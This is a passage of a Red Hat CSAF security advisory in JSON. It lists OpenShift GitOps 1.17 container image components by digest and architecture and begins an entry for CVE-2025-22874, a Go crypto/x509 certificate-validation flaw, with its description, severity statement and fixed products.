"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:54f6d32f5aa8ad998eb98ef2035b7593704cca8db98251ff77405801920e324b_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:ba88e66dc3f39019be91230d122ee73e0b0b931a6d3c7d7130f2a7dbb0d4c553_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:cbbc245f3f5be44aff1e09b209c814bb7128b53d2530b17c02c4b810fe682787_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:d3f6398dc0b730251e2cac7826c14cca18324ce6854d7844aad43ebc22a1c7ec_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-22874",
"cwe": {
"id": "CWE-295",
"name": "Improper Certificate Validation"
},
"discovery_date": "2025-06-11T17:00:48.521459+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:faa950d8512bc45382646c6c7d403ebf91fcd47d8ca65f4124fed91e77bebf2e_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:af6d72cac08a08cc48d446e426fe1e34e21d71a7779dafdbea08173be063149f_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/gitops-operator-bundle@sha256:4fc82c51692138acd9a7232fc4b3451cbca9f7be763452c811bea7a68867cb93_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:c9ec61f94b616f0dff0c0aa0de9d719449a6d24e77b4ac2af760098af5328523_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2372320"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Go\u0027s crypto/x509 package. This vulnerability allows improper certificate validation, bypassing policy constraints via using ExtKeyUsageAny in VerifyOptions.KeyUsages.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/x509: Usage of ExtKeyUsageAny disables policy validation in crypto/x509",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw is rated as an Important severity because the vulnerability was found in the certificate validation logic of the Verify function. When VerifyOptions.KeyUsages includes ExtKeyUsageAny, certificate chains containing policy graphs may bypass certificate policy validation. This flaw allows an attacker to trick the system into accepting an invalid certificate, potentially enabling spoofing attacks, the issue weakens trust decisions in affected cases and impacts system integrity. Confidentiality and availability are not affected.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:a2339147b13271b43dfd58901f09ed024a5f8d1ad1def8639c416710d68f1ca3_amd64",
